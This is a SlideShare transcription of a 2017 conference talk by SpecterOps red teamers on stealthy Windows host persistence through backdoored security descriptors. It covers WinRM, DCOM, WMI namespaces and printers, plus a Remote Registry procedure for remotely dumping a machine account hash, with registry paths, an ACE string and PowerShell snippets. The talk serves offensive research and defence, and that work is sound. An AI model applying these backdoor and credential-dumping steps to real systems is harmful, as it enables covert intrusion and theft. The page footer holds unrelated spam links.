SlideShare une entreprise Scribd logo

An ACE in the Hole - Stealthy Host Persistence via Security Descriptors

Will Schroeder
Will Schroeder

This talk was given at DerbyCon 2017.

Internet
1  sur  63
Télécharger pour lire hors ligne
An ACE in the Hole Stealthy Host Persistence via Security Descriptors
Who We Are × @tifkin_ / @enigma0x3 / @harmj0y × Red teamers/researchers at SpecterOps × Code on code on code × Cons on cons on cons 2
What This Is × Offensive applications × Intro to securable objects × Our Research Process × Securable object takeover primitives × Case studies/demos × Defense 3
1. Offensive Applications WHY this is useful 4
“As an offensive researcher, if you can dream it, someone has likely already done it...and that someone isn’t the kind of person who speaks at security cons” 5 Matt “f’ing” Graeber BlackHat 2015
6
7
Why Care (really)? × It’s often difficult to determine whether a specific security descriptor misconfiguration was set maliciously or configured by accident × These changes also have a minimal different forensic footprint and grant: × Bug longevity! Privesc! Persistence! × They might already be on your system ;) × Living off the land++ (existed since NT was born!) 8
Big Point(s) × Most defenders are not aware of this general persistence approach, much less how to find and remediate it! × You don’t need to leave malicious code/logic on a system to regain access! × What if this change was made to an organization’s “gold image”? 9
Responsibly Evil ;) × Also, you don’t need to set the principal/trustee (who has the rights) to S-1-1-0! × Security descriptor backdoors can be set for specific trustees in a targeted manner so exposure in the environment is minimized 10
¯_(ツ)_/¯ × “if an attacker has code execution on your system, you’re screwed already, so who cares“ × “You need admin rights to do this, this is stupid!“ × To this we say: domain joined boxes != isolated home systems × we guess the defensive industry should just pack up and leave… 11
2. Intro to Securable Objects Security Descriptors 101 12
What is a “Securable Object”? A windows object that can have a security descriptor
SECURITY_DESCRIPTOR https://msdn.microsoft.com/en-us/library/windows/hardware/ff556610(v=vs.85).aspx 14
15 DACL ACE’s
Where are these descriptors? × Found in the registry, the file system, in the kernel, ntds.dit.... × Really depends on the type of object × Finding what objects are securable, much less exactly where their descriptors are located, isn’t as easy as you’d think... 16
From DACLs to SACLs 17 × Access Control List (ACL) is basically shorthand for the DACL/SACL superset × An object’s Discretionary Access Control List (DACL) and Security Access Control List (SACL) are ordered collections of Access Control Entries (ACEs) × DACL - What principals/trustees have what rights over the object × The SACL - Specifies how to audit access to the object
Standard vs. Object-Specific 18http://searchwindowsserver.techtarget.com/feature/The-structure-of-an-ACE
More on DACLs 19 × Null DACL != no DACL × Inheritance… can be a >_< × General interpretation: × Explicit Deny × Explicit Allow × Inherited Deny × Inherited Allow
Our Securable Object Research Methodology 20
Our Research Approach Objects accessible from user-mode with a focus on one's usable for persistence/lateral movement 1. Discover securable object 1. Offline and Online Security Descriptors Enumeration 1. Analyze Access mask a. What object-specific rights are there (if any)? b. What rights permit persistence/lateral movement? 1. Operational Weaponization and Detection 21
1. Discovering Securable Objects × Windows documentation lists about 20-30 securable objects* × We’ve identified 70+! (There’s *many* more) × Microsoft Protocol Specifications × Very useful for RPC servers × Find-RegistrySecurityDescriptors.ps1 22*https://msdn.microsoft.com/en-us/library/windows/desktop/aa379557(v=vs.85).aspx
23 Find-RegistrySecurityDescriptors
2. Online vs Offline Security Descriptors × Where do objects get their security descriptor? × Offline - Security descriptor derived from registry, file, ntds.dit, etc. × Online - Security descriptor is in memory Our approach to enumeration: × Locally as an unprivileged user × Locally as a privileged user × Remotely as an unprivileged user × Remotely as a privileged user 24
Existing Tooling × Use existing tools × Accesschk.exe × WindowsDACLEnumProject × Google’s sandbox analysis tools × NtObjectManager woot woot! × BloodHound × Most do not distinguish between online/offline security descriptors × Implication: How do you know if an object has been modified after creation? 25
Enumeration Caveats × “Online” vs offline security descriptors × Necessary token privileges × Some objects are “invisible” to user-mode enumeration × Kernel private namespaces × Does an object with no name have a security descriptor? × https://googleprojectzero.blogspot.co.uk/2014/10/did-man-with-no-name-feel- insecure.html 26
3. Access Mask Analysis Taking back what’s yours ;) 27
Deriving Access Mask Meaning × MSDN Documentation × Technical Specifications × Reversing × Trial and error ¯_(ツ)_/¯ 28
Generic Object Takeover Primitives × Attacker is owner (implies WRITE_DAC) × Attacker has WRITE_DAC/WRITE_OWNER × Attacks has STANDARD_RIGHTS_ALL × Attacker has GENERIC_ALL* × Object has NULL security descriptor (implies Everyone has GENERIC_ALL) 29 Depends on how the object maps the generic right to standard/object-specific rights. Usually this includes WRITE_DAC/WRITE_OWNER, but doesn’t have to
Object-specific Takeover Primitives × Each securable object can define its own rights × Example: Process Rights × PROCESS_CREATE_PROCESS × PROCESS_CREATE_THREAD × PROCESS_SUSPEND_RESUME × PROCESS_QUERY_INFORMATION × PROCESS_TERMINATE × The specific object and its rights determine its offensive usefulness (priv esc, lateral movement, persistence, etc.) 30
4. Operational Weaponization and Detection Case studies of certain securable objects 31
Service Control Manager RPC Server × “RPC server that enables service configuration and control of service programs.” - MS-SCMR × Applicable Securable Objects × Service Control Manager Server × Windows Services 32
SCM Server Applicable Rights 33 SC_MANAGER_CONNECT Permits connecting to service SC_MANAGER_CREATE_SERVICE Ability to add a new service SC_MANAGER_ENUMERATE_SERVICE List out services By default, unauthenticated users can enumerate the security descriptor of the SCM Server!
34 SCM Demo https://youtu.be/tETNO22zVKM
WinRM/WinRS × Windows Remote Management/Windows Remote Shell × Provides the ability to remotely interface with a host × Think PowerShell Remoting × Create backdoored ACE and apply it to either the WinRM or WinRS DACL × Or both!! × Defined user (via SID) will be able to remotely interact with the host without admin privs 35
WinRM/WinRS × Security Descriptor can be accessed by pulling the SecurityDescriptorSDDL property of Get- PSSessionConfiguration × Build the new DACL via DiscretionaryAcl.AddAccess() of Security.AccessControl.CommonSecurityDescriptor × PowerShell Remoting: × Set the new DACL via -SecurityDescriptorSddl of Set-PSSessionConfiguration × WinRS × Set WSMan:localhostServiceRootSDDL to the new DACL via Set-Item 36
WinRM/WinRS × Already weaponized here: https://github.com/ssOleg/Useful_code/blo b/master/Set-RemoteShellAccess.ps1 × In 2014…. × Takes a domain SID and adds an ACE for that SID to both PowerShell Remoting and WinRS DACLs × Allows that specific user/group to remotely interface with WinRM/WinRS without having any additional privilege 37
DCOM × Distributed Component Object Model × Been around since 1996… >_< × Secured via Launch and Activation Permissions × Local/Remote, perms reside in the registry × Can you use interesting DCOM applications to get code-execution? × Applications with “ExecuteShellCommand()” × Backdoor your favorite DCOM application for a specific user/group’s SID :-) 38
DCOM × Access is determined via machine-wide permissions first and then application specific permissions × Add target user/group to allow machine-wide Remote Activation/Launch Permissions × Instead of editing the Default, just edit the Limit × HKLM:SoftwaremicrosoftoleMachineLaunchRestriction × A;;CCRPLC;;;$SID × Backdoor a specific DCOM Application for a domain user/group × HKLM:SoftwareClassesAppID{GUID}LaunchPermission × HKLM:SoftwareClassesAppID{GUID}AccessPermission × Requires: SeTakeOwnershipPrivilege, SeRestorePrivilege, SeSecurityPrivilege if installing locally 39
DCOM 40https://msdn.microsoft.com/en-us/library/windows/desktop/ms679714(v=vs.85).aspx
41 DCOM Demo https://youtu.be/e-tYtfmcoWk
WMI NameSpaces × Contains a collection of WMI classes that host various methods/properties × Each namespace has associated DACLs × Windows checks the DCOM machine-wide launch permissions for the first stage of access × If successful, the DACLs on the WMI namespace are then checked × Backdoor a NameSpace that contains a class with a useful method × Create() method of Win32_Process, for example 42
WMI NameSpaces × Call GetSecurityDescriptor() on the target WMI namespace (local requires SeSecurityPrivilege) × Use Win32_Ace to set our Access Mask and flags × Use Win32_Trustee to assign the user × Set the “Trustee” property of Win32_Ace to our Win32_Trustee object × Add our new ACE to the target namespace DACL: $NameSpaceACL.DACL += $Ace.PSObject.ImmediateBaseObject × Call SetSecurityDescriptor() with the newly updated NameSpace object to set it 43
WMI NameSpaces 44https://msdn.microsoft.com/en-us/library/aa394679(v=vs.85).aspx
45 WMI Namespace Demo https://youtu.be/C1OpX_n7HlY
× Securable Objects a. Printer Servers HKLMSYSTEMCurrentControlSetControl PrintServerSecurityDescriptor a. Printer Objects HKEY_LOCAL_MACHINESOFTWAREMicrosoft Windows NTCurrentVersionPrintPrinters Security a. Print Jobs - Not very interesting offensively Specifications: MS-RPRN, MS-PAR, MS-PAN, MS-PRSOD 46 Printers
47 Print Server Control - Spooler
48 Print Server Control - Drivers
49 Get-NetPrinter
50 Get-NetShare Additions
Remote Registry × Allows permitted users/groups to access the registry remotely via .NET/Win32 API × [Microsoft.Win32.RegistryKey]::OpenRemoteBaseKey() × The RemoteRegistry service has to be enabled and the calling user has to have access × By default in Windows 7/10, this service is disabled × Remote access to the registry == ability to dump hashes (among other things) 😈 51
Remote Registry × Imagine this scenario: Remotely dumping an endpoint’s machine account hash as an unprivileged user × Remotely backdoor the winreg key for a specified user/group × Located at HKLM:SYSTEMCurrentControlSetControl SecurePipeServerswinreg × The DACL on this key decides who is allowed to connect via remote registry 52
Remote Registry × Can be accomplished via WMI’s StdRegProv provider × Call SetSecurityDescriptor() with an ACE that defines the user/permissions for the backdoor × Why not just use StdRegProv? × Dumping the machine account hash requires obtaining various Registry Key classes. × Can only be obtained via RegQueryInfoKey() × Use Set-Service to remotely set the service StartupType to “Manual” × Set-Service -Name "RemoteRegistry" -ComputerName $Computer -StartupType "Manual" 53
Remote Registry × Remotely take ownership of the SECURITY registry hive and add an ACE to the DACL for the backdoor user × As that user, remotely call RegConnectRegistry() × Open the required keys and pull the Key’s Class × SYSTEMCurrentControlSetControlLsa<JD,Skew1,GBG,DATA> × RegOpenKeyEx(), RegQueryInfoKey() × Combine these Class values and compute the BootKey × Use the BootKey to decrypt the LSA key × Use the LSA key to decrypt the machine account hash 54
55 Remote Registry
56 Remote Registry Demo https://youtu.be/pOHO3hdTKyw
6. Defense All is not lost! 57
× A system access control list × “Enables administrators to log attempts to access a secured object” × Not used as extensively as they should be! SACLs: the other ACL 58
Defensive Enumeration × More research is needed- you can’t defend against what you aren’t aware of! × Defensive PowerUp++ ? Operational test framework for the detection of backdoor scenarios? × Integration into BloodHound? 59
Takeaways × The host-control graph is *MUCH* bigger than “is member of local admin group” × What is the real attack surface of a Windows host? × Many “forgotten” or unexplored RPC/DCOM servers × Many other securable objects we haven’t looked at 60
61
× Implications of other securable objects × Real-time analysis × Enumeration of objects visible only to the kernel × Chaining host + AD security descriptor abuse Takeaways & Future Work 62
Thanks! Any questions? @tifkin_ / @enigma0x3 / @harmj0y https://specterops.io/ 63

Recommandé

The Unintended Risks of Trusting Active Directory
The Unintended Risks of Trusting Active DirectoryThe Unintended Risks of Trusting Active Directory
The Unintended Risks of Trusting Active Directory
Will Schroeder
 
Derbycon - The Unintended Risks of Trusting Active Directory
Derbycon - The Unintended Risks of Trusting Active DirectoryDerbycon - The Unintended Risks of Trusting Active Directory
Derbycon - The Unintended Risks of Trusting Active Directory
Will Schroeder
 
PSConfEU - Offensive Active Directory (With PowerShell!)
PSConfEU - Offensive Active Directory (With PowerShell!)PSConfEU - Offensive Active Directory (With PowerShell!)
PSConfEU - Offensive Active Directory (With PowerShell!)
Will Schroeder
 
ReCertifying Active Directory
ReCertifying Active DirectoryReCertifying Active Directory
ReCertifying Active Directory
Will Schroeder
 
SpecterOps Webinar Week - Kerberoasting Revisisted
SpecterOps Webinar Week - Kerberoasting RevisistedSpecterOps Webinar Week - Kerberoasting Revisisted
SpecterOps Webinar Week - Kerberoasting Revisisted
Will Schroeder
 
Beyond the mcse red teaming active directory
Beyond the mcse red teaming active directoryBeyond the mcse red teaming active directory
Beyond the mcse red teaming active directory
Priyanka Aash
 
aclpwn - Active Directory ACL exploitation with BloodHound
aclpwn - Active Directory ACL exploitation with BloodHoundaclpwn - Active Directory ACL exploitation with BloodHound
aclpwn - Active Directory ACL exploitation with BloodHound
DirkjanMollema
 
DerbyCon 2019 - Kerberoasting Revisited
DerbyCon 2019 - Kerberoasting RevisitedDerbyCon 2019 - Kerberoasting Revisited
DerbyCon 2019 - Kerberoasting Revisited
Will Schroeder
 

Recommandé

The Unintended Risks of Trusting Active Directory
The Unintended Risks of Trusting Active DirectoryThe Unintended Risks of Trusting Active Directory
The Unintended Risks of Trusting Active Directory
Will Schroeder
 
Derbycon - The Unintended Risks of Trusting Active Directory
Derbycon - The Unintended Risks of Trusting Active DirectoryDerbycon - The Unintended Risks of Trusting Active Directory
Derbycon - The Unintended Risks of Trusting Active Directory
Will Schroeder
 
PSConfEU - Offensive Active Directory (With PowerShell!)
PSConfEU - Offensive Active Directory (With PowerShell!)PSConfEU - Offensive Active Directory (With PowerShell!)
PSConfEU - Offensive Active Directory (With PowerShell!)
Will Schroeder
 
ReCertifying Active Directory
ReCertifying Active DirectoryReCertifying Active Directory
ReCertifying Active Directory
Will Schroeder
 
SpecterOps Webinar Week - Kerberoasting Revisisted
SpecterOps Webinar Week - Kerberoasting RevisistedSpecterOps Webinar Week - Kerberoasting Revisisted
SpecterOps Webinar Week - Kerberoasting Revisisted
Will Schroeder
 
Beyond the mcse red teaming active directory
Beyond the mcse red teaming active directoryBeyond the mcse red teaming active directory
Beyond the mcse red teaming active directory
Priyanka Aash
 
aclpwn - Active Directory ACL exploitation with BloodHound
aclpwn - Active Directory ACL exploitation with BloodHoundaclpwn - Active Directory ACL exploitation with BloodHound
aclpwn - Active Directory ACL exploitation with BloodHound
DirkjanMollema
 
DerbyCon 2019 - Kerberoasting Revisited
DerbyCon 2019 - Kerberoasting RevisitedDerbyCon 2019 - Kerberoasting Revisited
DerbyCon 2019 - Kerberoasting Revisited
Will Schroeder
 
Here Be Dragons: The Unexplored Land of Active Directory ACLs
Here Be Dragons: The Unexplored Land of Active Directory ACLsHere Be Dragons: The Unexplored Land of Active Directory ACLs
Here Be Dragons: The Unexplored Land of Active Directory ACLs
Andy Robbins
 
I hunt sys admins 2.0
I hunt sys admins 2.0I hunt sys admins 2.0
I hunt sys admins 2.0
Will Schroeder
 
Catch Me If You Can: PowerShell Red vs Blue
Catch Me If You Can: PowerShell Red vs BlueCatch Me If You Can: PowerShell Red vs Blue
Catch Me If You Can: PowerShell Red vs Blue
Will Schroeder
 
(Ab)Using GPOs for Active Directory Pwnage
(Ab)Using GPOs for Active Directory Pwnage(Ab)Using GPOs for Active Directory Pwnage
(Ab)Using GPOs for Active Directory Pwnage
Petros Koutroumpis
 
Carlos García - Pentesting Active Directory Forests [rooted2019]
Carlos García - Pentesting Active Directory Forests [rooted2019]Carlos García - Pentesting Active Directory Forests [rooted2019]
Carlos García - Pentesting Active Directory Forests [rooted2019]
RootedCON
 
Hunting for Credentials Dumping in Windows Environment
Hunting for Credentials Dumping in Windows EnvironmentHunting for Credentials Dumping in Windows Environment
Hunting for Credentials Dumping in Windows Environment
Teymur Kheirkhabarov
 
Fantastic Red Team Attacks and How to Find Them
Fantastic Red Team Attacks and How to Find ThemFantastic Red Team Attacks and How to Find Them
Fantastic Red Team Attacks and How to Find Them
Ross Wolf
 
Not a Security Boundary
Not a Security BoundaryNot a Security Boundary
Not a Security Boundary
Will Schroeder
 
Troopers 19 - I am AD FS and So Can You
Troopers 19 - I am AD FS and So Can YouTroopers 19 - I am AD FS and So Can You
Troopers 19 - I am AD FS and So Can You
Douglas Bienstock
 
Red Team Revenge - Attacking Microsoft ATA
Red Team Revenge - Attacking Microsoft ATARed Team Revenge - Attacking Microsoft ATA
Red Team Revenge - Attacking Microsoft ATA
Nikhil Mittal
 
Ace Up the Sleeve
Ace Up the SleeveAce Up the Sleeve
Ace Up the Sleeve
Will Schroeder
 
Introduction to red team operations
Introduction to red team operationsIntroduction to red team operations
Introduction to red team operations
Sunny Neo
 
I Hunt Sys Admins
I Hunt Sys AdminsI Hunt Sys Admins
I Hunt Sys Admins
Will Schroeder
 
How fun of privilege escalation Red Pill2017
How fun of privilege escalation Red Pill2017How fun of privilege escalation Red Pill2017
How fun of privilege escalation Red Pill2017
Ammarit Thongthua ,CISSP CISM GXPN CSSLP CCNP
 
Defending Your "Gold"
Defending Your "Gold"Defending Your "Gold"
Defending Your "Gold"
Will Schroeder
 
Evading Microsoft ATA for Active Directory Domination
Evading Microsoft ATA for Active Directory DominationEvading Microsoft ATA for Active Directory Domination
Evading Microsoft ATA for Active Directory Domination
Nikhil Mittal
 
Hunting for Privilege Escalation in Windows Environment
Hunting for Privilege Escalation in Windows EnvironmentHunting for Privilege Escalation in Windows Environment
Hunting for Privilege Escalation in Windows Environment
Teymur Kheirkhabarov
 
Derbycon - Passing the Torch
Derbycon - Passing the TorchDerbycon - Passing the Torch
Derbycon - Passing the Torch
Will Schroeder
 
Six Degrees of Domain Admin - BloodHound at DEF CON 24
Six Degrees of Domain Admin - BloodHound at DEF CON 24Six Degrees of Domain Admin - BloodHound at DEF CON 24
Six Degrees of Domain Admin - BloodHound at DEF CON 24
Andy Robbins
 
BloodHound: Attack Graphs Practically Applied to Active Directory
BloodHound: Attack Graphs Practically Applied to Active DirectoryBloodHound: Attack Graphs Practically Applied to Active Directory
BloodHound: Attack Graphs Practically Applied to Active Directory
Andy Robbins
 
Building an EmPyre with Python
Building an EmPyre with PythonBuilding an EmPyre with Python
Building an EmPyre with Python
Will Schroeder
 
XPDS16: XSM-Flask, current limitations and Ongoing work. - Anshul Makkar, Ct...
XPDS16: XSM-Flask, current limitations and Ongoing work. - Anshul Makkar, Ct...XPDS16: XSM-Flask, current limitations and Ongoing work. - Anshul Makkar, Ct...
XPDS16: XSM-Flask, current limitations and Ongoing work. - Anshul Makkar, Ct...
The Linux Foundation
 

Contenu connexe

Tendances

(Ab)Using GPOs for Active Directory Pwnage
(Ab)Using GPOs for Active Directory Pwnage(Ab)Using GPOs for Active Directory Pwnage
(Ab)Using GPOs for Active Directory Pwnage
Petros Koutroumpis
 
Fantastic Red Team Attacks and How to Find Them
Fantastic Red Team Attacks and How to Find ThemFantastic Red Team Attacks and How to Find Them
Fantastic Red Team Attacks and How to Find Them
Ross Wolf
 

Tendances (20)

Here Be Dragons: The Unexplored Land of Active Directory ACLs
Here Be Dragons: The Unexplored Land of Active Directory ACLsHere Be Dragons: The Unexplored Land of Active Directory ACLs
Here Be Dragons: The Unexplored Land of Active Directory ACLs
 
I hunt sys admins 2.0
I hunt sys admins 2.0I hunt sys admins 2.0
I hunt sys admins 2.0
 
Catch Me If You Can: PowerShell Red vs Blue
Catch Me If You Can: PowerShell Red vs BlueCatch Me If You Can: PowerShell Red vs Blue
Catch Me If You Can: PowerShell Red vs Blue
 
(Ab)Using GPOs for Active Directory Pwnage
(Ab)Using GPOs for Active Directory Pwnage(Ab)Using GPOs for Active Directory Pwnage
(Ab)Using GPOs for Active Directory Pwnage
 
Carlos García - Pentesting Active Directory Forests [rooted2019]
Carlos García - Pentesting Active Directory Forests [rooted2019]Carlos García - Pentesting Active Directory Forests [rooted2019]
Carlos García - Pentesting Active Directory Forests [rooted2019]
 
Hunting for Credentials Dumping in Windows Environment
Hunting for Credentials Dumping in Windows EnvironmentHunting for Credentials Dumping in Windows Environment
Hunting for Credentials Dumping in Windows Environment
 
Fantastic Red Team Attacks and How to Find Them
Fantastic Red Team Attacks and How to Find ThemFantastic Red Team Attacks and How to Find Them
Fantastic Red Team Attacks and How to Find Them
 
Not a Security Boundary
Not a Security BoundaryNot a Security Boundary
Not a Security Boundary
 
Troopers 19 - I am AD FS and So Can You
Troopers 19 - I am AD FS and So Can YouTroopers 19 - I am AD FS and So Can You
Troopers 19 - I am AD FS and So Can You
 
Red Team Revenge - Attacking Microsoft ATA
Red Team Revenge - Attacking Microsoft ATARed Team Revenge - Attacking Microsoft ATA
Red Team Revenge - Attacking Microsoft ATA
 
Ace Up the Sleeve
Ace Up the SleeveAce Up the Sleeve
Ace Up the Sleeve
 
Introduction to red team operations
Introduction to red team operationsIntroduction to red team operations
Introduction to red team operations
 
I Hunt Sys Admins
I Hunt Sys AdminsI Hunt Sys Admins
I Hunt Sys Admins
 
How fun of privilege escalation Red Pill2017
How fun of privilege escalation Red Pill2017How fun of privilege escalation Red Pill2017
How fun of privilege escalation Red Pill2017
 
Defending Your "Gold"
Defending Your "Gold"Defending Your "Gold"
Defending Your "Gold"
 
Evading Microsoft ATA for Active Directory Domination
Evading Microsoft ATA for Active Directory DominationEvading Microsoft ATA for Active Directory Domination
Evading Microsoft ATA for Active Directory Domination
 
Hunting for Privilege Escalation in Windows Environment
Hunting for Privilege Escalation in Windows EnvironmentHunting for Privilege Escalation in Windows Environment
Hunting for Privilege Escalation in Windows Environment
 
Derbycon - Passing the Torch
Derbycon - Passing the TorchDerbycon - Passing the Torch
Derbycon - Passing the Torch
 
Six Degrees of Domain Admin - BloodHound at DEF CON 24
Six Degrees of Domain Admin - BloodHound at DEF CON 24Six Degrees of Domain Admin - BloodHound at DEF CON 24
Six Degrees of Domain Admin - BloodHound at DEF CON 24
 
BloodHound: Attack Graphs Practically Applied to Active Directory
BloodHound: Attack Graphs Practically Applied to Active DirectoryBloodHound: Attack Graphs Practically Applied to Active Directory
BloodHound: Attack Graphs Practically Applied to Active Directory
 

Similaire à An ACE in the Hole - Stealthy Host Persistence via Security Descriptors

Remote security with Red Hat Enterprise Linux
Remote security with Red Hat Enterprise LinuxRemote security with Red Hat Enterprise Linux
Remote security with Red Hat Enterprise Linux
Giuseppe Paterno'
 
3.Secure Design Principles And Process
3.Secure Design Principles And Process3.Secure Design Principles And Process
3.Secure Design Principles And Process
phanleson
 
Sheng defense
Sheng defenseSheng defense
Sheng defense
kalyan_bu
 
7 latest-dot-net-interview-questions
7 latest-dot-net-interview-questions7 latest-dot-net-interview-questions
7 latest-dot-net-interview-questions
sadiqkhanpathan
 

Similaire à An ACE in the Hole - Stealthy Host Persistence via Security Descriptors (20)

Building an EmPyre with Python
Building an EmPyre with PythonBuilding an EmPyre with Python
Building an EmPyre with Python
 
XPDS16: XSM-Flask, current limitations and Ongoing work. - Anshul Makkar, Ct...
XPDS16: XSM-Flask, current limitations and Ongoing work. - Anshul Makkar, Ct...XPDS16: XSM-Flask, current limitations and Ongoing work. - Anshul Makkar, Ct...
XPDS16: XSM-Flask, current limitations and Ongoing work. - Anshul Makkar, Ct...
 
Automate threat detections and avoid false positives
Automate threat detections and avoid false positives Automate threat detections and avoid false positives
Automate threat detections and avoid false positives
 
Automatiza las detecciones de amenazas y evita los falsos positivos
Automatiza las detecciones de amenazas y evita los falsos positivosAutomatiza las detecciones de amenazas y evita los falsos positivos
Automatiza las detecciones de amenazas y evita los falsos positivos
 
Automatiza las detecciones de amenazas y evita falsos positivos
Automatiza las detecciones de amenazas y evita falsos positivosAutomatiza las detecciones de amenazas y evita falsos positivos
Automatiza las detecciones de amenazas y evita falsos positivos
 
Automatiza las detecciones de amenazas y evita falsos positivos
Automatiza las detecciones de amenazas y evita falsos positivosAutomatiza las detecciones de amenazas y evita falsos positivos
Automatiza las detecciones de amenazas y evita falsos positivos
 
Automatisez la détection des menaces et évitez les faux positifs
Automatisez la détection des menaces et évitez les faux positifsAutomatisez la détection des menaces et évitez les faux positifs
Automatisez la détection des menaces et évitez les faux positifs
 
Automate threat detections and avoid false positives
Automate threat detections and avoid false positivesAutomate threat detections and avoid false positives
Automate threat detections and avoid false positives
 
Automatize a detecção de ameaças e evite falsos positivos
Automatize a detecção de ameaças e evite falsos positivosAutomatize a detecção de ameaças e evite falsos positivos
Automatize a detecção de ameaças e evite falsos positivos
 
Drilling deeper with Veil's PowerTools
Drilling deeper with Veil's PowerToolsDrilling deeper with Veil's PowerTools
Drilling deeper with Veil's PowerTools
 
Up is Down, Black is White: Using SCCM for Wrong and Right
Up is Down, Black is White: Using SCCM for Wrong and RightUp is Down, Black is White: Using SCCM for Wrong and Right
Up is Down, Black is White: Using SCCM for Wrong and Right
 
Remote security with Red Hat Enterprise Linux
Remote security with Red Hat Enterprise LinuxRemote security with Red Hat Enterprise Linux
Remote security with Red Hat Enterprise Linux
 
3.Secure Design Principles And Process
3.Secure Design Principles And Process3.Secure Design Principles And Process
3.Secure Design Principles And Process
 
Bridging the Gap
Bridging the GapBridging the Gap
Bridging the Gap
 
Forensic Memory Analysis of Android's Dalvik Virtual Machine
Forensic Memory Analysis of Android's Dalvik Virtual MachineForensic Memory Analysis of Android's Dalvik Virtual Machine
Forensic Memory Analysis of Android's Dalvik Virtual Machine
 
Sheng defense
Sheng defenseSheng defense
Sheng defense
 
dtrace_topics_intro.pdf
dtrace_topics_intro.pdfdtrace_topics_intro.pdf
dtrace_topics_intro.pdf
 
7 latest-dot-net-interview-questions
7 latest-dot-net-interview-questions7 latest-dot-net-interview-questions
7 latest-dot-net-interview-questions
 
Permission enforcement s in android new (1)
Permission enforcement s in android new (1)Permission enforcement s in android new (1)
Permission enforcement s in android new (1)
 
Database security and privacy
Database security and privacyDatabase security and privacy
Database security and privacy
 

Plus de Will Schroeder

Plus de Will Schroeder (14)

Apres-Cyber - The Data Dilemma: Bridging Offensive Operations and Machine Lea...
Apres-Cyber - The Data Dilemma: Bridging Offensive Operations and Machine Lea...Apres-Cyber - The Data Dilemma: Bridging Offensive Operations and Machine Lea...
Apres-Cyber - The Data Dilemma: Bridging Offensive Operations and Machine Lea...
 
Nemesis - SAINTCON.pdf
Nemesis - SAINTCON.pdfNemesis - SAINTCON.pdf
Nemesis - SAINTCON.pdf
 
Certified Pre-Owned
Certified Pre-OwnedCertified Pre-Owned
Certified Pre-Owned
 
A Case Study in Attacking KeePass
A Case Study in Attacking KeePassA Case Study in Attacking KeePass
A Case Study in Attacking KeePass
 
The Travelling Pentester: Diaries of the Shortest Path to Compromise
The Travelling Pentester: Diaries of the Shortest Path to CompromiseThe Travelling Pentester: Diaries of the Shortest Path to Compromise
The Travelling Pentester: Diaries of the Shortest Path to Compromise
 
A Year in the Empire
A Year in the EmpireA Year in the Empire
A Year in the Empire
 
Trusts You Might Have Missed - 44con
Trusts You Might Have Missed - 44conTrusts You Might Have Missed - 44con
Trusts You Might Have Missed - 44con
 
PSConfEU - Building an Empire with PowerShell
PSConfEU - Building an Empire with PowerShellPSConfEU - Building an Empire with PowerShell
PSConfEU - Building an Empire with PowerShell
 
I Have the Power(View)
I Have the Power(View)I Have the Power(View)
I Have the Power(View)
 
Building an Empire with PowerShell
Building an Empire with PowerShellBuilding an Empire with PowerShell
Building an Empire with PowerShell
 
Trusts You Might Have Missed
Trusts You Might Have MissedTrusts You Might Have Missed
Trusts You Might Have Missed
 
Adventures in Asymmetric Warfare
Adventures in Asymmetric WarfareAdventures in Asymmetric Warfare
Adventures in Asymmetric Warfare
 
Pwnstaller
PwnstallerPwnstaller
Pwnstaller
 
PowerUp - Automating Windows Privilege Escalation
PowerUp - Automating Windows Privilege EscalationPowerUp - Automating Windows Privilege Escalation
PowerUp - Automating Windows Privilege Escalation
 

Dernier

Call Girls In Pratap Nagar Delhi 💯Call Us 🔝8264348440🔝
Call Girls In Pratap Nagar Delhi 💯Call Us 🔝8264348440🔝Call Girls In Pratap Nagar Delhi 💯Call Us 🔝8264348440🔝
Call Girls In Pratap Nagar Delhi 💯Call Us 🔝8264348440🔝
soniya singh
 
Russian Call Girls Pune (Adult Only) 8005736733 Escort Service 24x7 Cash Pay...
Russian Call Girls Pune (Adult Only) 8005736733 Escort Service 24x7 Cash Pay...Russian Call Girls Pune (Adult Only) 8005736733 Escort Service 24x7 Cash Pay...
Russian Call Girls Pune (Adult Only) 8005736733 Escort Service 24x7 Cash Pay...
SUHANI PANDEY
 
AWS Community DAY Albertini-Ellan Cloud Security (1).pptx
AWS Community DAY Albertini-Ellan Cloud Security (1).pptxAWS Community DAY Albertini-Ellan Cloud Security (1).pptx
AWS Community DAY Albertini-Ellan Cloud Security (1).pptx
ellan12
 
Low Sexy Call Girls In Mohali 9053900678 🥵Have Save And Good Place 🥵
Low Sexy Call Girls In Mohali 9053900678 🥵Have Save And Good Place 🥵Low Sexy Call Girls In Mohali 9053900678 🥵Have Save And Good Place 🥵
Low Sexy Call Girls In Mohali 9053900678 🥵Have Save And Good Place 🥵
Chandigarh Call girls 9053900678 Call girls in Chandigarh
 
Call Girls In Sukhdev Vihar Delhi 💯Call Us 🔝8264348440🔝
Call Girls In Sukhdev Vihar Delhi 💯Call Us 🔝8264348440🔝Call Girls In Sukhdev Vihar Delhi 💯Call Us 🔝8264348440🔝
Call Girls In Sukhdev Vihar Delhi 💯Call Us 🔝8264348440🔝
soniya singh
 
𓀤Call On 7877925207 𓀤 Ahmedguda Call Girls Hot Model With Sexy Bhabi Ready Fo...
𓀤Call On 7877925207 𓀤 Ahmedguda Call Girls Hot Model With Sexy Bhabi Ready Fo...𓀤Call On 7877925207 𓀤 Ahmedguda Call Girls Hot Model With Sexy Bhabi Ready Fo...
𓀤Call On 7877925207 𓀤 Ahmedguda Call Girls Hot Model With Sexy Bhabi Ready Fo...
Neha Pandey
 
Hire↠Young Call Girls in Tilak nagar (Delhi) ☎️ 9205541914 ☎️ Independent Esc...
Hire↠Young Call Girls in Tilak nagar (Delhi) ☎️ 9205541914 ☎️ Independent Esc...Hire↠Young Call Girls in Tilak nagar (Delhi) ☎️ 9205541914 ☎️ Independent Esc...
Hire↠Young Call Girls in Tilak nagar (Delhi) ☎️ 9205541914 ☎️ Independent Esc...
Delhi Call girls
 
Pune Airport ( Call Girls ) Pune 6297143586 Hot Model With Sexy Bhabi Ready...
Pune Airport ( Call Girls ) Pune 6297143586 Hot Model With Sexy Bhabi Ready...Pune Airport ( Call Girls ) Pune 6297143586 Hot Model With Sexy Bhabi Ready...
Pune Airport ( Call Girls ) Pune 6297143586 Hot Model With Sexy Bhabi Ready...
tanu pandey
 
6.High Profile Call Girls In Punjab +919053900678 Punjab Call GirlHigh Profil...
6.High Profile Call Girls In Punjab +919053900678 Punjab Call GirlHigh Profil...6.High Profile Call Girls In Punjab +919053900678 Punjab Call GirlHigh Profil...
6.High Profile Call Girls In Punjab +919053900678 Punjab Call GirlHigh Profil...
@Chandigarh #call #Girls 9053900678 @Call #Girls in @Punjab 9053900678
 
Call Now ☎ 8264348440 !! Call Girls in Shahpur Jat Escort Service Delhi N.C.R.
